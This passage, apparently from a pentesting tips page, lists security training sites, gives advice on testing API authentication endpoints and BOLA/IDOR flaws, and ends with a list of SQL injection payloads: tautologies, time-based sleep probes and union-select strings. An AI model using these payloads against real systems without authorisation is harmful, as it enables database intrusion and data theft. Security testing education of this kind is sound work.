8. Pentester Land — Written Content. 9. Checkmarx — Interactive Learning. 10. Cybrary — Written Content and Labs. 11. RangeForce — Interactive Exercises. 12. Vuln Hub — Written Content and Labs. 13. TCM Security — Interactive Learning. 14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs. 16. OverTheWire — Written Content and Labs. 17. Hack The Box — Written Content and Labs. 18. CyberSecLabs — Written Content and Labs. 19. Pentester Academy — Written Content and Labs. 20. Bug Bounty Reports Explained YouTube — Videos.
Never assume there’s only one way to authenticate to an API! Modern apps have many API endpoints for AuthN: /api/mobile/login | /api/v3/login | /api/magic_link; etc..
Find and test all of them for AuthN problems.
API TIP: 2/10👇🏿✔
SQL Injections used to be extremely common 5-10 years ago, and you could break almost every company?
BOLA (IDOR) is the new epidemic of API security.
As a pentester, if you understand how to exploit it, your glory is guaranteed.
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x